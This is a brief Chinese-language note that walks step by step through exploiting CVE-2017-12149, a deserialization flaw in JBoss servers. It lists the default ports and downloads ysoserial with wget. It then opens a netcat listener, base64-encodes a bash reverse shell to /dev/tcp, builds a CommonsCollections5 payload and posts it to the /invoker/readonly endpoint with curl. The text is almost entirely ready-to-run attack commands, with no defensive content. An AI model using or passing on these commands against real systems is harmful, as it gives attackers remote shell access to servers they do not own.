【笔记】CVE-2017-12149漏洞利用

前言

利用frohoff/ysoserial实现JBoss反序列化漏洞利用
默认端口1098,1099,4444,4445,8080,8009,8083,8093

下载项目

1
wget https://github.com/frohoff/ysoserial/releases/download/v0.0.6/ysoserial-all.jar

攻击者监听反弹Shell

1
nc -lvp <port>

将反弹Shell的命令进行Base64编码

1
echo -n "bash -i >& /dev/tcp/<ip>/<port> 0>&1" | base64

exp

  • 在当前目录下生成exp.ser文件

<base64>:上一步骤Base64编码后的反弹Shell命令

1
java -jar ysoserial-all.jar CommonsCollections5 "bash -c {echo,<base64>}|{base64,-d}|{bash,-i}" > exp.ser

触发

1
curl http://<ip>:<port>/invoker/readonly --data-binary @exp.ser

完成